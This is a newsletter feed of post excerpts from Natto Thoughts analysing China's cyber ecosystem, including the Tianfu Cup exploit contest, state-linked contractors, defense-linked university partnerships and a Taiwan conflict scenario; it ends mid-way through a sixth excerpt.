This post is co-authored by the Natto Team and Robin Dimyanoglu from<a href="https://blog.predictivedefense.io/"> Predictive Defense.</a><div><hr></div>Since the start of his second term in January 2025, the Trump administration has <a href="https://www.axios.com/2026/03/02/trump-iran-war-military-strikes-maga">conducted</a> military actions or strikes in seven countries. The ouster of Venezuelan president Nicolas Maduro in January 2026 and the ongoing US-Israeli joint military operation against Iran makes it feel as if the threshold for war has been lowered. Leaders across the globe are likely drawing their own conclusions. Bill Bishop, a China expert at Sinocism, <a href="https://substack.com/@sinocism/note/c-221158202?utm_source=notes-share-action&r=1fj33r">remarked</a>, “Maduro and now Ayatollah Ali Khamenei in two months. Would love to know what Xi really thinks about this,” referring to Chinese President Xi Jinping. Indeed, what does Xi think about these developments? In particular, how do they shape Xi’s views on Taiwan “reunification”? Have US military actions in seven countries influenced Xi’s perspective on using military force to achieve China’s goal of “reunification”—which he <a href="https://www.nattothoughts.com/i/141051336/what-are-xis-thoughts-on-taiwan-reunification-and-the-use-of-force-over-taiwan">considers</a> a “historical inevitability”?A potential conflict between China and Taiwan would represent a globally significant inflection point. Drawing from the Center for Strategic and International Studies (CSIS) 2023 <a href="https://www.csis.org/analysis/first-battle-next-war-wargaming-chinese-invasion-taiwan">report</a> The First Battle of the Next War: Wargaming a Chinese Invasion of Taiwan, this piece aims to conduct a reality check on a likely scenario of China-Taiwan conflict presented in the CSIS report, and examines the challenges and possible cyber implications of such a scenario and how organizations across sectors could be exposed, whether directly or indirectly.Based on war games involving a simulated invasion, the CSIS study provides insights under clearly defined assumptions, including participating actors and their roles, mobilization timelines, ammunition availability and the type of operations conducted. While no single study can predict outcomes, its transparent methodology and multi-scenario approach provide a useful analytical foundation.<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!fcLj!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcc577850-d184-4217-869e-4c78b24a7a25_1280x853.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!fcLj!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcc577850-d184-4217-869e-4c78b24a7a25_1280x853.png 424w, https://substackcdn.com/image/fetch/$s_!fcLj!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcc577850-d184-4217-869e-4c78b24a7a25_1280x853.png 848w, https://substackcdn.com/image/fetch/$s_!fcLj!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcc577850-d184-4217-869e-4c78b24a7a25_1280x853.png 1272w, https://substackcdn.com/image/fetch/$s_!fcLj!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcc577850-d184-4217-869e-4c78b24a7a25_1280x853.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!fcLj!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcc577850-d184-4217-869e-4c78b24a7a25_1280x853.png" width="1280" height="853" data-attrs="{"src":"https://substack-post-media.s3.amazonaws.com/public/images/cc577850-d184-4217-869e-4c78b24a7a25_1280x853.png","srcNoWatermark":null,"fullscreen":null,"imageSize":null,"height":853,"width":1280,"resizeWidth":null,"bytes":90833,"alt":null,"title":null,"type":"image/png","href":null,"belowTheFold":false,"topImage":true,"internalRedirect":"https://www.nattothoughts.com/i/192025448?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcc577850-d184-4217-869e-4c78b24a7a25_1280x853.png","isProcessing":false,"align":null,"offset":false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!fcLj!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcc577850-d184-4217-869e-4c78b24a7a25_1280x853.png 424w, https://substackcdn.com/image/fetch/$s_!fcLj!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcc577850-d184-4217-869e-4c78b24a7a25_1280x853.png 848w, https://substackcdn.com/image/fetch/$s_!fcLj!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcc577850-d184-4217-869e-4c78b24a7a25_1280x853.png 1272w, https://substackcdn.com/image/fetch/$s_!fcLj!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcc577850-d184-4217-869e-4c78b24a7a25_1280x853.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Credit: Wikimedia Commons</figcaption></figure></div><a class="button primary" href="https://www.nattothoughts.com/subscribe?">Subscribe now</a> <a href="https://www.nattothoughts.com/p/wargaming-a-china-taiwan-conflict"> Read more </a>
Faux Amis: How France Stands Apart in Europe’s High-Risk University Cyber Partnerships with China

Wed, 11 Mar 2026 14:02:23 -0000

France hosts the EU’s densest cluster of cyber partnerships with Chinese defense-linked universities, raising exposure to dual-use knowledge transfer, EU funding access, and institutional influence

In September 2025, Intelligence Online <a href="https://www.intelligenceonline.com/asia-pacific/2025/09/16/french-engineering-schools-call-off-partnership-with-chinese-military-linked-beihang-university,110522377-art">reported</a> that France’s National Institute of Applied Sciences (Institut National des Sciences Appliquées, INSA) network of engineering schools had cancelled plans to establish a joint institute in Beijing with Beihang University (北京航空航天大学). The project had received initial clearance from relevant French ministries. Yet internal opposition within several INSA boards ultimately led to its cancellation just weeks before launch. According to the report, concerns centered on academic freedom and “the nature” of Beihang itself, which has been identified by a range of <a href="https://www.justice.gov/usao-ndca/pr/justice-department-declines-prosecution-company-self-disclosed-export-control-offenses">governments</a>, <a href="https://sciencebusiness.net/news/Horizon-Europe/read-details-five-eu-research-projects-involving-chinas-military-linked-universities?utm_source=chatgpt.com">research bodies</a>, and <a href="https://unitracker.aspi.org.au/universities/beihang-university?utm_source=chatgpt.com">policy institutions</a> as closely integrated into China’s defense research system and linked to the People’s Liberation Army.The episode reflects growing awareness in parts of the European Union (EU) about the strategic implications of university partnerships with Chinese institutions embedded in the country’s defense research system. However, it remains an isolated institutional reversal, with similar collaborations persisting in a number of countries. In December 2025, Beihang itself <a href="https://ev.buaa.edu.cn/info/1022/2880.htm">claimed </a>to have “elevated European cooperation to new heights.”Over the past decade, university cooperation between some EU member states and China has expanded rapidly across several fields. Many of these exchanges generate legitimate academic and economic benefits. However, some partner institutions are not simply civilian universities.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a> They are formally authorized to conduct classified weapons equipment research and are structurally embedded in China’s military and defense industrial system, raising concerns about dual-use knowledge transfer – research with both civilian and military applications – access to EU funding streams, and long-term institutional exposure and influence aligned with defense research agendas.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-2" href="#footnote-2" target="_self">2</a>Cyber-related disciplines are particularly sensitive. Fields such as software engineering, telecommunications, computer science, and information security cultivate inherently dual-use skills. These capabilities support civilian digital infrastructure and defensive cybersecurity, but also enable cyber espionage – including intellectual property theft – offensive cyber operations, and applications such as secure military communications and strategic command systems. Such capabilities can be deployed remotely in both peacetime and conflict.Within this landscape, France stands out. Among EU member states, it has the highest concentration of cyber partnerships involving Chinese institutions that hold state secrecy clearance or maintain formal ties to China’s defense establishment. This piece maps EU–China cyber-related joint degree partnerships, identifies institutional risk factors including security clearance status and defense affiliation, and examines the French case in depth. Beihang University’s School of Cyber Science and Technology serves as a central case study, including analysis of its state and defense industry ties and a review of research activities and affiliations of nearly 80 faculty members.The Appendix identifies EU–China cyber-related partnerships and their disciplinary focus, highlights relevant risk factors, and explains the methodology used to assess institutional affiliations and involvement in classified research.<a class="button primary" href="https://www.nattothoughts.com/subscribe?">Subscribe now</a> <a href="https://www.nattothoughts.com/p/faux-amis-how-france-stands-apart"> Read more </a>
China’s National Research Center for Information Technology Security: Is It Part of the PLA Cyberspace Force?

Wed, 25 Feb 2026 15:02:37 -0000

Under “Two signboards” arrangement, the NITSC offers services to public, Party, government, and military entities, under the guise of a civilian name.

Over the years, the Natto Team has published a substantial amount of <a href="https://www.nattothoughts.com/p/flax-typhoon-linked-company-integrity">research</a> on the role of China’s private sector in building the country’s cyber capabilities. The private sector, particularly the cybersecurity industry, has become an indispensable resource for the Chinese government in conducting advanced technological cybersecurity research, supporting offensive cyber operations, and defending the country’s critical infrastructure. However, we recognize that no matter how important the private sector’s role is, the government and military must have their own affiliated entities to conduct cybersecurity research and development, respond to cyber incidents, protect critical infrastructure, perform security testing and product evaluation, and carry out cyber operations. Glimpses of their activity come to light, such as the 2020 US <a href="https://www.justice.gov/archives/opa/pr/chinese-military-personnel-charged-computer-fraud-economic-espionage-and-wire-fraud-hacking">indictment </a>of members of the PLA 54th Research Institute for the “brazen criminal heist” of information from US credit reporting agency Equifax.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a> What more can we learn about entities directly affiliated with government agencies like the Ministry of State Security (MSS) or the People’s Liberation Army (PLA)? What capabilities do they possess that contribute to China’s emergence as “<a href="https://www.bloomsburycollections.com/monograph-detail?docid=b-9798881817602&pdfid=9798881817602.ch-8.pdf&tocid=b-9798881817602-chapter8#b-9798881817602-0002782">Cyber Superpower</a>”?<div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!6K3p!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F70d6bf41-bb7b-4604-bf52-52bbf6f90a74_624x100.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!6K3p!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F70d6bf41-bb7b-4604-bf52-52bbf6f90a74_624x100.png 424w, https://substackcdn.com/image/fetch/$s_!6K3p!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F70d6bf41-bb7b-4604-bf52-52bbf6f90a74_624x100.png 848w, https://substackcdn.com/image/fetch/$s_!6K3p!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F70d6bf41-bb7b-4604-bf52-52bbf6f90a74_624x100.png 1272w, https://substackcdn.com/image/fetch/$s_!6K3p!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F70d6bf41-bb7b-4604-bf52-52bbf6f90a74_624x100.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!6K3p!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F70d6bf41-bb7b-4604-bf52-52bbf6f90a74_624x100.png" width="624" height="100" data-attrs="{"src":"https://substack-post-media.s3.amazonaws.com/public/images/70d6bf41-bb7b-4604-bf52-52bbf6f90a74_624x100.png","srcNoWatermark":null,"fullscreen":null,"imageSize":null,"height":100,"width":624,"resizeWidth":null,"bytes":82103,"alt":null,"title":null,"type":"image/png","href":null,"belowTheFold":false,"topImage":true,"internalRedirect":"https://www.nattothoughts.com/i/188980727?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F70d6bf41-bb7b-4604-bf52-52bbf6f90a74_624x100.png","isProcessing":false,"align":null,"offset":false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!6K3p!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F70d6bf41-bb7b-4604-bf52-52bbf6f90a74_624x100.png 424w, https://substackcdn.com/image/fetch/$s_!6K3p!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F70d6bf41-bb7b-4604-bf52-52bbf6f90a74_624x100.png 848w, https://substackcdn.com/image/fetch/$s_!6K3p!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F70d6bf41-bb7b-4604-bf52-52bbf6f90a74_624x100.png 1272w, https://substackcdn.com/image/fetch/$s_!6K3p!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F70d6bf41-bb7b-4604-bf52-52bbf6f90a74_624x100.png 1456w" sizes="100vw" fetchpriority="high"></picture><div></div></div></a><figcaption class="image-caption">NITSC website banner. Source: NITSC</figcaption></figure></div>In this post, the Natto Team explores an example of a Chinese government and military-affiliated entity—the National Research Center for Information Technology Security (NITSC) (国家信息技术安全研究中心). We examine its organizational structure, affiliations, and capabilities, then reveal its military connections. Lastly, we present questions for further research.<a class="button primary" href="https://www.nattothoughts.com/subscribe?">Subscribe now</a> <a href="https://www.nattothoughts.com/p/chinas-national-research-center-for"> Read more </a>
The Tianfu Cup Returns Under MPS Leadership as AI Takes Center Stage

Wed, 11 Feb 2026 14:02:47 -0000

After a two-year hiatus, the Tianfu Cup returns under MPS lead, combining AI-assisted vulnerability discovery and exploitation, a new competition track, and less transparency in vulnerability handling

The Tianfu Cup (天府杯), China’s premier exploit hacking competition,<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a> has returned to Chengdu, Sichuan Province, for its sixth edition, held from January 29 to 30, 2026. This time, under the organizational lead of China’s Ministry of Public Security (MPS), China’s domestic law-enforcement authority. Launched in 2018 after Chinese authorities <a href="https://www.atlanticcouncil.org/in-depth-research-reports/report/capture-the-red-flag-an-inside-look-into-chinas-hacking-contest-ecosystem/">barred</a> domestic researchers from participating in international exploit competitions, such as Canada’s Pwn2Own, the Tianfu Cup emerged as a domestic alternative for high-end vulnerability research and exploitation.<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!5R9h!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F73caeb4b-09f3-4459-bd6e-74f6af4cba5d_1280x555.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!5R9h!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F73caeb4b-09f3-4459-bd6e-74f6af4cba5d_1280x555.png 424w, https://substackcdn.com/image/fetch/$s_!5R9h!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F73caeb4b-09f3-4459-bd6e-74f6af4cba5d_1280x555.png 848w, https://substackcdn.com/image/fetch/$s_!5R9h!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F73caeb4b-09f3-4459-bd6e-74f6af4cba5d_1280x555.png 1272w, https://substackcdn.com/image/fetch/$s_!5R9h!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F73caeb4b-09f3-4459-bd6e-74f6af4cba5d_1280x555.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!5R9h!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F73caeb4b-09f3-4459-bd6e-74f6af4cba5d_1280x555.png" width="1280" height="555" data-attrs="{"src":"https://substack-post-media.s3.amazonaws.com/public/images/73caeb4b-09f3-4459-bd6e-74f6af4cba5d_1280x555.png","srcNoWatermark":null,"fullscreen":null,"imageSize":null,"height":555,"width":1280,"resizeWidth":null,"bytes":687976,"alt":null,"title":null,"type":"image/png","href":null,"belowTheFold":false,"topImage":true,"internalRedirect":null,"isProcessing":false,"align":null,"offset":false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!5R9h!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F73caeb4b-09f3-4459-bd6e-74f6af4cba5d_1280x555.png 424w, https://substackcdn.com/image/fetch/$s_!5R9h!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F73caeb4b-09f3-4459-bd6e-74f6af4cba5d_1280x555.png 848w, https://substackcdn.com/image/fetch/$s_!5R9h!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F73caeb4b-09f3-4459-bd6e-74f6af4cba5d_1280x555.png 1272w, https://substackcdn.com/image/fetch/$s_!5R9h!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F73caeb4b-09f3-4459-bd6e-74f6af4cba5d_1280x555.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">2026 Tianfu Cup homepage. Screenshot by the Natto Team, taken on January 31, 2026, of the Tianfu Cup 2026 website.</figcaption></figure></div>After skipping three editions in 2022, 2024, and 2025, the competition has now reappeared, although the reasons for this hiatus and revival remain unclear. The event was <a href="https://archive.ph/gwwpl">first announced </a>on China’s MPS website on January 16. On January 19, the Tianfu Cup’s account on the social media platform X appears to have briefly posted about the competition before deleting the post shortly thereafter. The following day, the event’s website (hxxps://tianfucup[.]cn) became inaccessible from outside China. By February 2, following the conclusion of the contest, the site appeared to have been taken offline entirely and remains inaccessible as of this writing. The Natto Team was nonetheless able to access the website for this piece, which includes screenshots of relevant information, as well as MPS and private company press releases that remain accessible.Building on earlier analyses of past Tianfu Cup events by the <a href="https://www.nattothoughts.com/p/tianfu-cup-2023-still-a-thing">Natto Team</a> and the <a href="https://css.ethz.ch/en/center/CSS-news/2024/06/from-vegas-to-chengdu-hacking-contests-bug-bounties-and-chinas-offensive-cyber-ecosystem.html">From Vegas to Chengdu report </a>from the Center for Security Studies at ETH Zurich, this piece examines what has changed with the Tianfu Cup’s return and why it matters. It analyzes the shift from a commercially led competition to one organized almost entirely by the MPS, specifically the Sichuan Provincial Public Security Bureau. It then looks at the structure of the 2026 edition and its two tracks, including evidence of AI-assisted techniques being used in vulnerability discovery and exploitation. Finally, it explores what remains the most consequential and unresolved question: where vulnerabilities discovered at the Tianfu Cup are likely to end up, and what this suggests about China’s evolving approach to vulnerability retention and state control.A complete list of competition targets, as disclosed on the 2026 Tianfu Cup website, is reproduced in the appendix at the end of this piece.<div class="subscription-widget-wrap-editor" data-attrs="{"url":"https://www.nattothoughts.com/subscribe?","text":"Subscribe","language":"en"}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble">Natto Thoughts is a reader-supported publication. To receive new posts and support the Natto Team’s work, consider becoming a free or paid subscriber.</div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email…" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div> <a href="https://www.nattothoughts.com/p/the-tianfu-cup-returns-under-mps"> Read more </a>
Provincial Tasking, Cross-Provincial Execution: A Case-Based Look at How China Scales Cyber Operations

Wed, 28 Jan 2026 15:02:08 -0000

How decentralized MSS and MPS tasking and market-enabled, cross-provincial execution by commercial firms shape the scale of China’s cyber operations

In a previous piece, we<a href="https://nattothoughts.substack.com/p/the-many-arms-of-the-mss-why-provincial"> argued</a> that provincial Ministry of State Security (MSS) bureaus function as key organizational nodes in China’s cyber operations – acting as operational nerve centers with their own internal priorities, resources, and institutional logics.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a> But this decentralization does not mean that cyber operations are siloed at the provincial level.Disclosures from a 2024 leak, together with a March 2025 U.S. indictment involving Anxun (<a href="https://www.nattothoughts.com/p/i-soon-another-company-in-the-apt41">i-SOON</a>) Information Technology Co., Ltd (安洵信息技术有限公司), which has been linked to Chinese state-sponsored cyber campaigns, <a href="https://www.justice.gov/opa/pr/justice-department-charges-12-chinese-contract-hackers-and-law-enforcement-officers-global">indicate</a> that a single commercial actor can be tasked by, actively seek contract opportunities from, or perform work for, a large number of provincial MSS and Ministry of Public Security (MPS) bureaus. This case provides rare visibility into how a single firm can support multiple, distinct provincial mandates and supply the operational capacity through which intrusions are carried out at near-national scale.Building on this, this piece examines how companies allegedly linked to APT activity – concentrated in a small number of provinces – enable cross-provincial operational scaling, even as provincial bureaus remain the primary source of tasking and authority. It begins by briefly distinguishing legitimate businesses from front companies, then traces how earlier cyber operations were likely predominantly organized around provincially bounded, bureau-executed models centered on front companies.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-2" href="#footnote-2" target="_self">2</a> Next, it shows how market maturity enabled greater collaboration between government agencies and legitimate firms, and concludes by examining why these firms are concentrated in a handful of provinces.<div class="subscription-widget-wrap-editor" data-attrs="{"url":"https://www.nattothoughts.com/subscribe?","text":"Subscribe","language":"en"}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble">Natto Thoughts is a reader-supported publication. To receive new posts and support the Natto Team’s work, consider becoming a free or paid subscriber.</div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email…" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div> <a href="https://www.nattothoughts.com/p/provincial-tasking-cross-provincial"> Read more </a>
China’s 2025 Top 20 Cybersecurity Companies: Which “Dark Horses” Will Emerge to Prominence in 2026?

Wed, 14 Jan 2026 15:03:15 -0000

Annual ranking reveals hyper-competitive, innovation-focused top performers – some familiar and some not so well known, with extensive government ties

As we enter 2026, the geopolitical landscape appears more uncertain than ever. Ongoing conflicts, such as the Russia-Ukraine war, remain unresolved, while <a href="https://www.aei.org/articles/bracing-for-china-shock-2-0/">competition</a> among major world powers is intensifying. In such a climate, strength and capability are paramount. China’s cybersecurity industry <a href="https://web.archive.org/web/20251007173305/https:/www.ciids.cn/list_15/5033.html">recognizes</a> its special expertise as “the fundamental cornerstone for safeguarding national security.” Among the more than five thousand cybersecurity companies in China, which ones stand out as top providers of quality products and services, significantly contributing to China’s national security? The “2025 Top 20 Chinese Cybersecurity Enterprises (2025年中国网络安全前二十家企业)” list featured in the annual “China Internet Company Comprehensive Capability Index (CICCI) (中国互联网企业综合实力指数)” <a href="https://web.archive.org/web/20260108023343/https:/www.isc.org.cn/article/27470949623525376.html">report</a> published at the end of December 2025 by the <a href="https://web.archive.org/web/20250211023130/https:/www.isc.org.cn/article/15315.html">Internet Society of China</a> (ISC)—an industry association affiliated with the Chinese Ministry of Industry and Information Technology (MIIT)—offers a fresh perspective on the leading players in China’s cybersecurity industry as we begin our 2026 research focused on this sector.The Natto Team believes that understanding these Chinese cybersecurity companies is essential for grasping how China develops its cyber capabilities. Since launching Natto Thoughts in 2023, our team has investigated several Chinese cybersecurity companies involved in state-sponsored or state-linked cyber operations. Our <a href="https://nattothoughts.substack.com/p/a-look-back-at-the-top-5-natto-thoughts">findings</a> suggest that China has established a highly effective and state-aligned system, notably integrating the private sector—Chinese cybersecurity companies—in building its cyber capabilities.In this post, the Natto Team examines the overall development of China’s cybersecurity sector and the top cybersecurity companies of 2025 based on the ISC’s CICCI reports, which analyze these companies’ key performance indicators, innovation and research and development (R&D) capabilities, business and market coverage, and how their core functions align with China’s national priorities.<a class="button primary" href="https://www.nattothoughts.com/subscribe?">Subscribe now</a> <a href="https://www.nattothoughts.com/p/chinas-2025-top-20-cybersecurity"> Read more </a>
A Look Back at the Top 5 Natto Thoughts Reports in 2025

Tue, 06 Jan 2026 15:03:16 -0000

From attack–defense thinking to vulnerability research and exposed threat actors, we explored key aspects of China’s cyber ecosystem

<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://images.unsplash.com/photo-1633180888652-c561b86040f1?crop=entropy&cs=tinysrgb&fit=max&fm=jpg&ixid=M3wzMDAzMzh8MHwxfHNlYXJjaHw1M3x8d29yayUyMGhhcmR8ZW58MHx8fHwxNzY3NzE2MjMwfDA&ixlib=rb-4.1.0&q=80&w=1080" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://images.unsplash.com/photo-1633180888652-c561b86040f1?crop=entropy&cs=tinysrgb&fit=max&fm=jpg&ixid=M3wzMDAzMzh8MHwxfHNlYXJjaHw1M3x8d29yayUyMGhhcmR8ZW58MHx8fHwxNzY3NzE2MjMwfDA&ixlib=rb-4.1.0&q=80&w=1080 424w, https://images.unsplash.com/photo-1633180888652-c561b86040f1?crop=entropy&cs=tinysrgb&fit=max&fm=jpg&ixid=M3wzMDAzMzh8MHwxfHNlYXJjaHw1M3x8d29yayUyMGhhcmR8ZW58MHx8fHwxNzY3NzE2MjMwfDA&ixlib=rb-4.1.0&q=80&w=1080 848w, https://images.unsplash.com/photo-1633180888652-c561b86040f1?crop=entropy&cs=tinysrgb&fit=max&fm=jpg&ixid=M3wzMDAzMzh8MHwxfHNlYXJjaHw1M3x8d29yayUyMGhhcmR8ZW58MHx8fHwxNzY3NzE2MjMwfDA&ixlib=rb-4.1.0&q=80&w=1080 1272w, 